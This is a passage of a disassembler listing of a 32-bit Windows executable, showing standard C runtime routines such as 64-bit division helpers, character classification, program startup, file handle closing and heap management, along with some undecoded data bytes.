add edx, ecx
jb short loc_4209C5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4209C5
jb short loc_4209C6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4209C6
loc_4209C5: ; CODE XREF: sub_420930+85�j
; sub_420930+8B�j
dec esi
loc_4209C6: ; CODE XREF: sub_420930+8D�j
; sub_420930+93�j
xor edx, edx
mov eax, esi
loc_4209CA: ; CODE XREF: sub_420930+57�j
dec edi
jnz short loc_4209D4
neg edx
neg eax
sbb edx, 0
loc_4209D4: ; CODE XREF: sub_420930+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_420930 endp
; ---------------------------------------------------------------------------
dw 146Ah
aHFc db 'h¸”C',0
aS_u db 'è.U',0
align 2
a3IRbdN db '3ۉ]ࡤ)N',0
dword_4209F0 dd 2875C33Bh, 8B08458Bh, 0F1838D0h, 0CB84h, 800A8A00h
dd 0A7C61F9h, 7F7AF980h, 20E98005h, 38420A88h, 0E9EA751Ah
dd 0B0h, 35FF016Ah, 4E29B4h, 0FF6A5353h, 680875FFh, 200h
dd 511FE850h, 0C4830000h, 0E4458920h, 840FC33Bh, 85h, 83FC5D89h
dd 0E08303C0h, 0DFCEE8FCh, 6589FFFFh, 89F48BE8h, 10EBDC75h
dd 0C340C033h, 0E8E8658Bh, 500Ah, 0F633DB33h, 0FFFC4D83h
dd 1675F33Bh, 0E8E475FFh, 0FFFFDB57h, 0C7F08B59h, 1E045h
dd 0F33B0000h, 16A3374h, 29B435FFh, 75FF004Eh, 0FF6A56E4h
dd 680875FFh, 200h, 29A435FFh, 0AAE8004Eh, 83000050h, 0C08520C4h
dd 0FF560B74h, 5E80875h, 59FFFFE4h, 0E05D3959h, 0E8560774h
dd 0FFFFD7D9h, 8458B59h, 0E8D0658Dh, 547Bh
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_420AD5 proc near ; CODE XREF: sub_41A293+1AF�p
arg_0 = dword ptr 4
cmp ds:dword_4437B0, 1
jle short loc_420AEC
push 4
push [esp+4+arg_0]
call sub_422B91
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420AEC: ; CODE XREF: sub_420AD5+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
sub_420AD5 endp
; =============== S U B R O U T I N E =======================================
sub_420AFE proc near ; CODE XREF: sub_423327+92�p
; sub_423327+B6�p ...
arg_0 = dword ptr 4
cmp ds:dword_4437B0, 1
jle short loc_420B15
push 8
push [esp+4+arg_0]
call sub_422B91
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420B15: ; CODE XREF: sub_420AFE+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
sub_420AFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B27 proc near ; CODE XREF: sub_41ACB2+6�p
; seg000:0041B3E7�p ...
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_4E29A4, 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
jz loc_420BE8
cmp ds:dword_443A84, 0
jz short loc_420B51
cmp ebx, 7Fh
jbe loc_420BE8
loc_420B51: ; CODE XREF: sub_420B27+1F�j
xor esi, esi
mov edi, 100h
inc esi
cmp ebx, edi
jnb short loc_420B7F
cmp ds:dword_4437B0, esi
jle short loc_420B70
push esi
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_420B7B
; ---------------------------------------------------------------------------
loc_420B70: ; CODE XREF: sub_420B27+3C�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_420B7B: ; CODE XREF: sub_420B27+47�j
test eax, eax
jz short loc_420BF5
loc_420B7F: ; CODE XREF: sub_420B27+34�j
mov edx, ds:off_4437D8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_420BA3
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop eax
jmp short loc_420BAC
; ---------------------------------------------------------------------------
loc_420BA3: ; CODE XREF: sub_420B27+6B�j
mov [ebp+var_4], bl
mov [ebp+var_3], 0
mov eax, esi
loc_420BAC: ; CODE XREF: sub_420B27+7A�j
push esi
push ds:dword_4E29B4
lea ecx, [ebp+var_8]
push 3
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push edi
push ds:dword_4E29A4
call sub_425B55
add esp, 20h
test eax, eax
jz short loc_420BF5
cmp eax, esi
jnz short loc_420BDB
movzx eax, [ebp+var_8]
jmp short loc_420BF7
; ---------------------------------------------------------------------------
loc_420BDB: ; CODE XREF: sub_420B27+AC�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
jmp short loc_420BF7
; ---------------------------------------------------------------------------
loc_420BE8: ; CODE XREF: sub_420B27+12�j
; sub_420B27+24�j
cmp ebx, 41h
jl short loc_420BF5
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_420BF7
loc_420BF5: ; CODE XREF: sub_420B27+56�j
; sub_420B27+A8�j ...
mov eax, ebx
loc_420BF7: ; CODE XREF: sub_420B27+B2�j
; sub_420B27+BF�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_420B27 endp
; ---------------------------------------------------------------------------
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
sub_420C00 proc near ; CODE XREF: sub_41D6C3+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_420C21
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_420C71
; ---------------------------------------------------------------------------
loc_420C21: ; CODE XREF: sub_420C00+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_420C2F: ; CODE XREF: sub_420C00+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_420C2F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_420C5A
cmp edx, [esp+4+arg_4]
ja short loc_420C5A
jb short loc_420C62
cmp eax, [esp+4+arg_0]
jbe short loc_420C62
loc_420C5A: ; CODE XREF: sub_420C00+4A�j
; sub_420C00+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_420C62: ; CODE XREF: sub_420C00+52�j
; sub_420C00+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_420C71: ; CODE XREF: sub_420C00+1F�j
pop ebx
retn 10h
sub_420C00 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_420C80 proc near ; CODE XREF: sub_41D6C3+24�p
; sub_41F87E+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_420CA2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_420CE3
; ---------------------------------------------------------------------------
loc_420CA2: ; CODE XREF: sub_420C80+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_420CB0: ; CODE XREF: sub_420C80+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_420CB0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_420CDE
cmp edx, [esp+8+arg_4]
ja short loc_420CDE
jb short loc_420CDF
cmp eax, [esp+8+arg_0]
jbe short loc_420CDF
loc_420CDE: ; CODE XREF: sub_420C80+4E�j
; sub_420C80+54�j
dec esi
loc_420CDF: ; CODE XREF: sub_420C80+56�j
; sub_420C80+5C�j
xor edx, edx
mov eax, esi
loc_420CE3: ; CODE XREF: sub_420C80+20�j
pop esi
pop ebx
retn 10h
sub_420C80 endp
; =============== S U B R O U T I N E =======================================
sub_420CE8 proc near ; CODE XREF: start-C31ED�p start-C31C7�p ...
arg_0 = dword ptr 4
cmp ds:dword_4E295C, 1
jnz short loc_420CF6
call sub_4261E0
loc_420CF6: ; CODE XREF: sub_420CE8+7�j
push [esp+arg_0]
call sub_426069
push 0FFh
call ds:off_4437C0
pop ecx
pop ecx
retn
sub_420CE8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_420D0D: ; CODE XREF: start+1A2�j
; DATA XREF: start+19D�o
push 60h
push offset dword_4394C8
call sub_425F14
mov edi, 94h
mov eax, edi
call sub_41EA20
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_42B064 ; GetVersionExA
mov ecx, [esi+10h]
mov ds:dword_4E2900, ecx
mov eax, [esi+4]
mov ds:dword_4E290C, eax
mov edx, [esi+8]
mov ds:dword_4E2910, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov ds:dword_4E2904, esi
cmp ecx, 2
jz short loc_420D6D
or esi, 8000h
mov ds:dword_4E2904, esi
loc_420D6D: ; CODE XREF: start-C32A1�j
shl eax, 8
add eax, edx
mov ds:dword_4E2908, eax
xor esi, esi
push esi
mov edi, ds:dword_42B024
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_420DA8
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_420DA8
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_420DC0
cmp eax, 20Bh
jz short loc_420DAD
loc_420DA8: ; CODE XREF: start-C3279�j start-C326C�j ...
mov [ebp-1Ch], esi
jmp short loc_420DD4
; ---------------------------------------------------------------------------
loc_420DAD: ; CODE XREF: start-C325A�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_420DA8
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_420DCE
; ---------------------------------------------------------------------------
loc_420DC0: ; CODE XREF: start-C3261�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_420DA8
xor eax, eax
cmp [ecx+0E8h], esi
loc_420DCE: ; CODE XREF: start-C3242�j
setnz al
mov [ebp-1Ch], eax
loc_420DD4: ; CODE XREF: start-C3255�j
push esi
call sub_4210EF
pop ecx
test eax, eax
jnz short loc_420E00
cmp ds:dword_4E295C, 1
jnz short loc_420DED
call sub_4261E0
loc_420DED: ; CODE XREF: start-C321A�j
push 1Ch
call sub_426069
push 0FFh
call sub_41F116
pop ecx
pop ecx
loc_420E00: ; CODE XREF: start-C3223�j
call sub_423257
mov [ebp-4], esi
call sub_42418E
test eax, eax
jge short loc_420E19
push 1Bh
call sub_420CE8
pop ecx
loc_420E19: ; CODE XREF: start-C31F1�j
call ds:dword_42B1A8 ; GetCommandLineA
mov ds:dword_4E2F04, eax
call sub_4266BC
mov ds:dword_4E2954, eax
call sub_42661A
test eax, eax
jge short loc_420E3F
push 8
call sub_420CE8
pop ecx
loc_420E3F: ; CODE XREF: start-C31CB�j
call sub_4263E7
test eax, eax
jge short loc_420E50
push 9
call sub_420CE8
pop ecx
loc_420E50: ; CODE XREF: start-C31BA�j
push 1
call sub_41F146
pop ecx
mov [ebp-28h], eax
cmp eax, esi
jz short loc_420E66
push eax
call sub_420CE8
pop ecx
loc_420E66: ; CODE XREF: start-C31A3�j
mov [ebp-44h], esi
lea eax, [ebp-70h]
push eax
call ds:dword_42B1A4 ; GetStartupInfoA
call sub_42638A
mov [ebp-20h], eax
test byte ptr [ebp-44h], 1
jz short loc_420E87
movzx eax, word ptr [ebp-40h]
jmp short loc_420E8A
; ---------------------------------------------------------------------------
loc_420E87: ; CODE XREF: start-C3181�j
push 0Ah
pop eax
loc_420E8A: ; CODE XREF: start-C317B�j
push eax
push dword ptr [ebp-20h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40A263
mov edi, eax
mov [ebp-2Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_420EA8
push edi
call sub_41F271
loc_420EA8: ; CODE XREF: start-C3160�j
call sub_41F293
jmp short loc_420EDA
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
aLeLLImPqsys db '‹Eì‹',8,'‹',9,'‰MÜPQèYS',0
align 10h
aYyLeslGF db 'YYËeè‹}܃}ä',0
db 75h, 6, 57h
dd 0FFE3ADE8h, 0E3C8E8FFh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_420EDA: ; CODE XREF: start-C3153�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call sub_425F4F
retn
; END OF FUNCTION CHUNK FOR start
; =============== S U B R O U T I N E =======================================
sub_420EE9 proc near ; CODE XREF: sub_41E24B+2A�p
; sub_426A43+2C5�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_4E2B98
jnb loc_420F83
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
lea ebx, ds:4E2BA0h[eax*4]
mov eax, [ebx]
shl esi, 3
test byte ptr [eax+esi+4], 1
jz short loc_420F83
push edi
call sub_42696C
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_420F62
cmp edi, 1
jz short loc_420F30
cmp edi, 2
jnz short loc_420F46
loc_420F30: ; CODE XREF: sub_420EE9+40�j
push 2
call sub_42696C
push 1
mov ebp, eax
call sub_42696C
cmp eax, ebp
pop ecx
pop ecx
jz short loc_420F62
loc_420F46: ; CODE XREF: sub_420EE9+45�j
push edi
call sub_42696C
pop ecx
push eax
call ds:dword_42B004 ; CloseHandle
test eax, eax
jnz short loc_420F62
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_420F64
; ---------------------------------------------------------------------------
loc_420F62: ; CODE XREF: sub_420EE9+3B�j
; sub_420EE9+5B�j ...
xor ebp, ebp
loc_420F64: ; CODE XREF: sub_420EE9+77�j
push edi
call sub_4268F2
test ebp, ebp
mov eax, [ebx]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_420F7F
push ebp
call sub_422C0F
pop ecx
jmp short loc_420F94
; ---------------------------------------------------------------------------
loc_420F7F: ; CODE XREF: sub_420EE9+8B�j
xor eax, eax
jmp short loc_420F97
; ---------------------------------------------------------------------------
loc_420F83: ; CODE XREF: sub_420EE9+E�j
; sub_420EE9+2F�j
and ds:dword_4E28F8, 0
mov ds:dword_4E28F4, 9
loc_420F94: ; CODE XREF: sub_420EE9+94�j
or eax, 0FFFFFFFFh
loc_420F97: ; CODE XREF: sub_420EE9+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_420EE9 endp
; =============== S U B R O U T I N E =======================================
sub_420F9C proc near ; CODE XREF: sub_41E24B+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_420FC5
test al, 8
jz short loc_420FC5
push dword ptr [esi+8]
call sub_41E2A1
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_420FC5: ; CODE XREF: sub_420F9C+A�j
; sub_420F9C+E�j
pop esi
retn
sub_420F9C endp
; =============== S U B R O U T I N E =======================================
sub_420FC7 proc near ; CODE XREF: sub_41E24B+1A�p
; seg000:00420801�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_421016
test ax, 108h
jz short loc_421016
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_421015
push edi
push eax
push dword ptr [esi+10h]
call sub_425882
add esp, 0Ch
cmp eax, edi
jnz short loc_42100E
mov eax, [esi+0Ch]
test al, al
jns short loc_421015
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_421015
; ---------------------------------------------------------------------------
loc_42100E: ; CODE XREF: sub_420FC7+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_421015: ; CODE XREF: sub_420FC7+25�j
; sub_420FC7+3D�j ...
pop edi
loc_421016: ; CODE XREF: sub_420FC7+13�j
; sub_420FC7+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_420FC7 endp
; ---------------------------------------------------------------------------
dd 24748B56h, 75F68508h, 2CE85609h, 59000000h, 0E856C35Eh
dd 0FFFFFF8Bh, 7459C085h, 0FFC88305h, 46F6C35Eh, 0F74400Dh
dd 0E81076FFh, 5954h, 1BD8F759h, 33C35EC0h, 53C35EC0h
dd 0F6335756h, 0FF33DB33h, 3F203539h, 4D7E004Eh, 4E2F08A1h
dd 0B0048B00h, 3874C085h, 0F60C488Bh, 307483C1h, 10247C83h
dd 500F7501h, 0FFFF93E8h, 0FFF883FFh, 431D7459h, 7C831AEBh
dd 75001024h, 2C1F613h, 0E8500E74h, 0FFFFFF78h, 59FFF883h
dd 0F80B0275h, 20353B46h, 7C004E3Fh, 247C83B3h, 0C38B0110h
dd 0C78B0274h, 0C35B5E5Fh, 8CE8016Ah, 59FFFFFFh
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_4210D5 proc near ; CODE XREF: sub_4210EF+20�p
cmp ds:dword_4E2900, 2
jnz short loc_4210EB
cmp ds:dword_4E290C, 5
jb short loc_4210EB
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4210EB: ; CODE XREF: sub_4210D5+7�j
; sub_4210D5+10�j
push 3
pop eax
retn
sub_4210D5 endp
; =============== S U B R O U T I N E =======================================
sub_4210EF proc near ; CODE XREF: start-C322B�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_42B1B0 ; HeapCreate
test eax, eax
mov ds:dword_4E2EFC, eax
jz short loc_421139
call sub_4210D5
cmp eax, 3
mov ds:dword_4E2F00, eax
jnz short loc_42113C
push 3F8h
call sub_421140
test eax, eax
pop ecx
jnz short loc_42113C
push ds:dword_4E2EFC
call ds:dword_42B1AC ; HeapDestroy
loc_421139: ; CODE XREF: sub_4210EF+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42113C: ; CODE XREF: sub_4210EF+2D�j
; sub_4210EF+3C�j
xor eax, eax
inc eax
retn
sub_4210EF endp
; =============== S U B R O U T I N E =======================================
sub_421140 proc near ; CODE XREF: sub_4210EF+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_4E2EFC
call ds:dword_42B0E4 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4E2EE8, eax
jnz short loc_42115D
retn
; ---------------------------------------------------------------------------
loc_42115D: ; CODE XREF: sub_421140+1A�j
mov ecx, [esp+arg_0]
and ds:dword_4E2EE0, 0
and ds:dword_4E2EE4, 0
mov ds:dword_4E2EF0, eax
xor eax, eax
mov ds:dword_4E2EEC, ecx
mov ds:dword_4E2EF4, 10h
inc eax
retn
sub_421140 endp
; =============== S U B R O U T I N E =======================================
sub_421188 proc near ; CODE XREF: sub_41E2A1+13�p
; sub_41E3C2+48�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4E2EE4
lea ecx, [eax+eax*4]
mov eax, ds:dword_4E2EE8
lea ecx, [eax+ecx*4]
jmp short loc_4211AC
; ---------------------------------------------------------------------------
loc_42119A: ; CODE XREF: sub_421188+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4211B2
add eax, 14h
loc_4211AC: ; CODE XREF: sub_421188+10�j
cmp eax, ecx
jb short loc_42119A
xor eax, eax
locret_4211B2: ; CODE XREF: sub_421188+1F�j
retn
sub_421188 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4211B3 proc near ; CODE XREF: sub_41E2A1+1F�p
; sub_41E3C2+9C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_4214C7
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_42127E
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_421216
push 3Fh
pop edx
loc_421216: ; CODE XREF: sub_4211B3+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_421260
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_421241
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42125D
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42125D
; ---------------------------------------------------------------------------
loc_421241: ; CODE XREF: sub_4211B3+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42125D
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42125D: ; CODE XREF: sub_4211B3+85�j
; sub_4211B3+8C�j ...
mov ebx, [ebp+arg_4]
loc_421260: ; CODE XREF: sub_4211B3+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_42127E: ; CODE XREF: sub_4211B3+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_42128C
push 3Fh
pop edx
loc_42128C: ; CODE XREF: sub_4211B3+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_42132A
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_4212B1
mov ebx, esi
loc_4212B1: ; CODE XREF: sub_4211B3+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_4212C3
mov edx, esi
loc_4212C3: ; CODE XREF: sub_4211B3+10C�j
cmp ebx, edx
jz short loc_421325
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_42130D
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_4212F3
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42130D
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_42130D
; ---------------------------------------------------------------------------
loc_4212F3: ; CODE XREF: sub_4211B3+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_42130D
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_42130D: ; CODE XREF: sub_4211B3+11D�j
; sub_4211B3+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_421325: ; CODE XREF: sub_4211B3+112�j
mov esi, [ebp+arg_4]
jmp short loc_42132D
; ---------------------------------------------------------------------------
loc_42132A: ; CODE XREF: sub_4211B3+E2�j
mov ebx, [ebp+arg_0]
loc_42132D: ; CODE XREF: sub_4211B3+175�j
cmp [ebp+var_C], 0
jnz short loc_42133B
cmp ebx, edx
jz loc_4213BB
loc_42133B: ; CODE XREF: sub_4211B3+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_4213BB
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_421392
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_421381
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_421381: ; CODE XREF: sub_4211B3+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_4213BB
; ---------------------------------------------------------------------------
loc_421392: ; CODE XREF: sub_4211B3+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4213A8
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4213A8: ; CODE XREF: sub_4211B3+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_4213BB: ; CODE XREF: sub_4211B3+182�j
; sub_4211B3+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_4214C6
mov eax, ds:dword_4E2EE0
test eax, eax
jz loc_4214B8
mov ecx, ds:dword_4E2EF8
mov esi, ds:dword_42B1B4
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_4E2EF8
mov eax, ds:dword_4E2EE0
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4E2EE0
mov eax, [eax+10h]
mov ecx, ds:dword_4E2EF8
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4E2EE0
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4E2EE0
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_421449
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4E2EE0
loc_421449: ; CODE XREF: sub_4211B3+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4214B8
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_4E2EE0
push dword ptr [eax+10h]
push 0
push ds:dword_4E2EFC
call ds:dword_42B0E0 ; RtlFreeHeap
mov eax, ds:dword_4E2EE4
mov edx, ds:dword_4E2EE8
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4E2EE0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41F980
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4E2EE4
cmp eax, ds:dword_4E2EE0
jbe short loc_4214AE
sub [ebp+arg_0], 14h
loc_4214AE: ; CODE XREF: sub_4211B3+2F5�j
mov eax, ds:dword_4E2EE8
mov ds:dword_4E2EF0, eax
loc_4214B8: ; CODE XREF: sub_4211B3+223�j
; sub_4211B3+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_4E2EE0, eax
mov ds:dword_4E2EF8, edi
loc_4214C6: ; CODE XREF: sub_4211B3+216�j
pop ebx
loc_4214C7: ; CODE XREF: sub_4211B3+37�j
pop edi
pop esi
leave
retn
sub_4211B3 endp
; =============== S U B R O U T I N E =======================================
sub_4214CB proc near ; CODE XREF: sub_421967+150�p
mov eax, ds:dword_4E2EE4
mov ecx, ds:dword_4E2EF4
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_421511
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4E2EE8
push edi
push ds:dword_4E2EFC
call ds:dword_42B194 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_421500
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_421500: ; CODE XREF: sub_4214CB+2F�j
add ds:dword_4E2EF4, 10h
mov ds:dword_4E2EE8, eax
mov eax, ds:dword_4E2EE4
loc_421511: ; CODE XREF: sub_4214CB+10�j
mov ecx, ds:dword_4E2EE8
push esi
push 41C4h
push 8
